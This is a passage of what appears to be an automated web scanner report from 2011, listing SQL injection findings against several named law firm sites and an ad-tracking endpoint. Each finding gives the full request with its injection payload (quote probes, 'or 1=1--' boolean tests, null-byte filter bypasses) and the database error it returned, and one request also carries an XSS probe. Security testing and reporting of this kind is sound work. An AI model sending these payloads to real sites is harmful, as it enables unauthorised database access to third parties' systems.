GET /red/psi/sites/www.tydingslaw.com/p.json?callback=_ate.ad.hpr&uid=4dc048d9159e4ae3&url=http%3A%2F%2Fwww.tydingslaw.com%2FContent.aspx%3Ftopic%3DAnother_Thorn_in_Creditors_Sides_New_Case_Makes_Preference_Payments_Easier_to_Claw_Back&ref=http%3A%2F%2Fwww.tydingslaw.com%2FPracticesIndustries%2Fpid%2F7%2FCommercial-and-Business-Litigation-.aspx&3vpnn2 HTTP/1.1
Host: ds.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: uid=4dc048d9159e4ae3; psc=4; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X'%20and%201%3d1--%20; di=1305201657.1OD|1305200976.1FE|1305200976.60; uit=1

Response 1

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 510
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Thu, 12 May 2011 16:12:04 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sat, 11 Jun 2011 16:12:04 GMT; Path=/
Set-Cookie: di=%7B%7D..1305216724.1FE|1305216724.1OD|1305216724.60; Domain=.addthis.com; Expires=Sat, 11-May-2013 16:11:57 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Thu, 12 May 2011 16:12:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 12 May 2011 16:12:04 GMT
Connection: close

_ate.ad.hpr({"urls":["http://pixel.33across.com/ps/?pid=454&uid=4dc048d9159e4ae3","http://xcdn.xgraph.net/15530/db/xg.gif?pid=15530&sid=10001&type=db&p_bid=4dc048d9159e4ae3","http://cspix.media6degrees.com/orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4dc048d9159e4ae3&curl=http%3a%2f%2fwww.tydingslaw.com%2fContent.aspx%3ftopic%3dAnother_Thorn_in_Creditors_Sides_New_Case_Makes_Preference_Payments_Easier_to_Claw_Back"],"segments" : ["1FE","1OD","60"],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})

Request 2

GET /red/psi/sites/www.tydingslaw.com/p.json?callback=_ate.ad.hpr&uid=4dc048d9159e4ae3&url=http%3A%2F%2Fwww.tydingslaw.com%2FContent.aspx%3Ftopic%3DAnother_Thorn_in_Creditors_Sides_New_Case_Makes_Preference_Payments_Easier_to_Claw_Back&ref=http%3A%2F%2Fwww.tydingslaw.com%2FPracticesIndustries%2Fpid%2F7%2FCommercial-and-Business-Litigation-.aspx&3vpnn2 HTTP/1.1
Host: ds.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: uid=4dc048d9159e4ae3; psc=4; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X'%20and%201%3d2--%20; di=1305201657.1OD|1305200976.1FE|1305200976.60; uit=1

Response 2

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 412
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Thu, 12 May 2011 16:12:04 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sat, 11 Jun 2011 16:12:04 GMT; Path=/
Set-Cookie: di=%7B%7D..1305216724.1FE|1305216724.60; Domain=.addthis.com; Expires=Sat, 11-May-2013 16:11:57 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Thu, 12 May 2011 16:12:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 12 May 2011 16:12:04 GMT
Connection: close

_ate.ad.hpr({"urls":["http://pixel.33across.com/ps/?pid=454&uid=4dc048d9159e4ae3","http://cspix.media6degrees.com/orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4dc048d9159e4ae3&curl=http%3a%2f%2fwww.tydingslaw.com%2fContent.aspx%3ftopic%3dAnother_Thorn_in_Creditors_Sides_New_Case_Makes_Preference_Payments_Easier_to_Claw_Back"],"segments" : ["1FE","60"],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})

1.2. http://layserfreiwald.com/attorneys.html [AID parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://layserfreiwald.com
Path:   /attorneys.html

Issue detail

The AID parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the AID parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /attorneys.html?mode=view&AID=8' HTTP/1.1
Host: layserfreiwald.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://layserfreiwald.com/
Cookie: CFID=8b46ceb8%2Df5f2%2D4810%2D8dca%2Db8cba45aa5c4; CFTOKEN=0; vt=u; __utma=146588073.159810427.1305223741.1305223741.1305223741.1; __utmb=146588073.1.10.1305223741; __utmc=146588073; __utmz=146588073.1305223741.1.1.utmcsr=elawmarketing.com|utmccn=(referral)|utmcmd=referral|utmcct=/portfolio/websites/layser-freiwald

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Thu, 12 May 2011 18:13:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Content-Length: 7379
Content-Type: text/html; charset=UTF-8

<!-- Railo [3.2.2.000] Error -->


<script>

var plus='data:image/gif;base64,R0lGODlhCQAJAIABAAAAAP///yH5BAEAAAEALAAAAAAJAAkAAAIRhI+hG7bwoJINIktzjizeUwAAOw==';
var minus='data
...[SNIP]...
<td style="border : 1px solid #350606;background-color :#FFCC00;">Line 4: Incorrect syntax near ''.</td>
...[SNIP]...

1.3. http://www.mccarter.com/new/biosnew.aspx [Initial parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mccarter.com
Path:   /new/biosnew.aspx

Issue detail

The Initial parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Initial parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /new/biosnew.aspx?ShowLast=True&Initial=H' HTTP/1.1
Host: www.mccarter.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mccarter.com/new/biosnew.aspx?search=&Location=
Cookie: ASPSESSIONIDQCACQABB=OKLLAFKBNJLCBGNOEOBIADKB; ASP.NET_SessionId=xsyokce4xrhmr5452u2baz45

Response 1

HTTP/1.1 500 Internal Server Error
Date: Thu, 12 May 2011 18:05:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6305

<html>
<head>
<title>Unclosed quotation mark after the character string ')ORDER BY dbo.Bios.[Last], dbo.Bios.[First]'.
Incorrect syntax near ')ORDER BY dbo.Bios.[Last], dbo.Bios.[First]'.</title>
...[SNIP]...

Request 2

GET /new/biosnew.aspx?ShowLast=True&Initial=H'' HTTP/1.1
Host: www.mccarter.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mccarter.com/new/biosnew.aspx?search=&Location=
Cookie: ASPSESSIONIDQCACQABB=OKLLAFKBNJLCBGNOEOBIADKB; ASP.NET_SessionId=xsyokce4xrhmr5452u2baz45

Response 2

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 18:05:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 26603


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<HTML>
   <HEAD>
       
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<META NAME="ROBOTS" CONTENT="NOYDIR,N
...[SNIP]...

1.4. http://www.mccarter.com/new/homenew.aspx [show parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mccarter.com
Path:   /new/homenew.aspx

Issue detail

The show parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the show parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /new/homenew.aspx?searchlink=showlocationnew.aspx&show=1433%00' HTTP/1.1
Host: www.mccarter.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mccarter.com/new/homenew.aspx?9c236--%3E%3Cscript%3Ealert(%22OOPS%22)%3C/script%3Eec7143486da=1
Cookie: ASPSESSIONIDQCACQABB=OKLLAFKBNJLCBGNOEOBIADKB; ASP.NET_SessionId=xsyokce4xrhmr5452u2baz45

Response

HTTP/1.1 500 Internal Server Error
Date: Thu, 12 May 2011 16:17:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4745

<html>
<head>
<title>Unclosed quotation mark after the character string ''.</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;
...[SNIP]...

1.5. http://www.mccarter.com/new/showbionew.aspx [show parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mccarter.com
Path:   /new/showbionew.aspx

Issue detail

The show parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the show parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /new/showbionew.aspx?show=997'&Related= HTTP/1.1
Host: www.mccarter.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mccarter.com/new/homenew.aspx?searchlink=showbionew&show=997
Cookie: ASPSESSIONIDQCACQABB=OKLLAFKBNJLCBGNOEOBIADKB; ASP.NET_SessionId=xsyokce4xrhmr5452u2baz45

Response 1

HTTP/1.1 500 Internal Server Error
Date: Thu, 12 May 2011 16:17:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4643

<html>
<head>
<title>Unclosed quotation mark after the character string '997''.
Incorrect syntax near '997''.</title>
<style>
   body {font-family:"Verdana";font-weight:
...[SNIP]...

Request 2

GET /new/showbionew.aspx?show=997''&Related= HTTP/1.1
Host: www.mccarter.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mccarter.com/new/homenew.aspx?searchlink=showbionew&show=997
Cookie: ASPSESSIONIDQCACQABB=OKLLAFKBNJLCBGNOEOBIADKB; ASP.NET_SessionId=xsyokce4xrhmr5452u2baz45

Response 2

HTTP/1.1 302 Found
Date: Thu, 12 May 2011 16:17:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: /new/biosnew.aspx
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 134

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='/new/biosnew.aspx'>here</a>.</h2>
</body></html>

1.6. http://www.mccarter.com/new/showcareerpagenew.aspx [show parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mccarter.com
Path:   /new/showcareerpagenew.aspx

Issue detail

The show parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the show parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /new/showcareerpagenew.aspx?show=1284%00' HTTP/1.1
Host: www.mccarter.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mccarter.com/new/homenew.aspx?searchlink=showcareerpagenew.aspx&show=1284
Cookie: ASPSESSIONIDQCACQABB=OKLLAFKBNJLCBGNOEOBIADKB; ASP.NET_SessionId=xsyokce4xrhmr5452u2baz45

Response

HTTP/1.1 500 Internal Server Error
Date: Thu, 12 May 2011 16:16:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4482

<html>
<head>
<title>Unclosed quotation mark after the character string ''.</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;
...[SNIP]...

1.7. http://www.mccarter.com/new/showeventnew.aspx [show parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mccarter.com
Path:   /new/showeventnew.aspx

Issue detail

The show parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the show parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /new/showeventnew.aspx?show=6164%00' HTTP/1.1
Host: www.mccarter.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mccarter.com/new/eventsnew.aspx
Cookie: ASPSESSIONIDQCACQABB=OKLLAFKBNJLCBGNOEOBIADKB; ASP.NET_SessionId=xsyokce4xrhmr5452u2baz45

Response

HTTP/1.1 500 Internal Server Error
Date: Thu, 12 May 2011 16:17:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4602

<html>
<head>
<title>Unclosed quotation mark after the character string ' order by [startdate] desc'.</title>
<style>
   body {font-family:"Verdana";font-weight:normal;fo
...[SNIP]...

1.8. http://www.mccarter.com/new/showlocationnew.aspx [show parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mccarter.com
Path:   /new/showlocationnew.aspx

Issue detail

The show parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the show parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /new/showlocationnew.aspx?show=1433' HTTP/1.1
Host: www.mccarter.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mccarter.com/new/homenew.aspx?searchlink=showlocationnew.aspx&show=1433
Cookie: ASPSESSIONIDQCACQABB=OKLLAFKBNJLCBGNOEOBIADKB; ASP.NET_SessionId=xsyokce4xrhmr5452u2baz45

Response

HTTP/1.1 500 Internal Server Error
Date: Thu, 12 May 2011 16:16:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4478

<html>
<head>
<title>Unclosed quotation mark after the character string ''.</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;
...[SNIP]...

1.9. http://www.peckshaffer.com/bonds.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.peckshaffer.com
Path:   /bonds.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /bonds.php?page=/1'news HTTP/1.1
Host: www.peckshaffer.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.peckshaffer.com/home.php

Response 1

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:46:32 GMT
Server: Apache/2.0.46 (Red Hat)
X-Powered-By: PHP/4.4.2
Content-Length: 319
Connection: close
Content-Type: text/html; charset=UTF-8

<!-- Bonds : Start -->


error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'news' LIMIT 1' at line 1 | 1064<BR>
...[SNIP]...

Request 2

GET /bonds.php?page=/1''news HTTP/1.1
Host: www.peckshaffer.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.peckshaffer.com/home.php

Response 2

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:46:32 GMT
Server: Apache/2.0.46 (Red Hat)
X-Powered-By: PHP/4.4.2
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15196

<!-- Bonds : Start -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www
...[SNIP]...

1.10. http://www.peckshaffer.com/bonds.php [page parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.peckshaffer.com
Path:   /bonds.php

Issue detail

The page parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the page parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /bonds.php?page=news' HTTP/1.1
Host: www.peckshaffer.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.peckshaffer.com/home.php

Response 1

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:46:23 GMT
Server: Apache/2.0.46 (Red Hat)
X-Powered-By: PHP/4.4.2
Content-Length: 324
Connection: close
Content-Type: text/html; charset=UTF-8

<!-- Bonds : Start -->


error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''bond news'' LIMIT 1' at line 1 | 1064<BR>
...[SNIP]...

Request 2

GET /bonds.php?page=news'' HTTP/1.1
Host: www.peckshaffer.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.peckshaffer.com/home.php

Response 2

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:46:23 GMT
Server: Apache/2.0.46 (Red Hat)
X-Powered-By: PHP/4.4.2
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15196

<!-- Bonds : Start -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www
...[SNIP]...

1.11. http://www.pillsburylaw.com/ [CFID cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /

Issue detail

The CFID cookie appears to be vulnerable to SQL injection attacks. The payloads 20752209%20or%201%3d1--%20 and 20752209%20or%201%3d2--%20 were each submitted in the CFID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/6
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=1181953720752209%20or%201%3d1--%20; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 19:51:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=;expires=Wed, 12-May-2010 19:51:08 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/6
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=1181953720752209%20or%201%3d2--%20; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11825829;path=/
Set-Cookie: CFTOKEN=73112688;path=/
Date: Thu, 12 May 2011 19:51:07 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
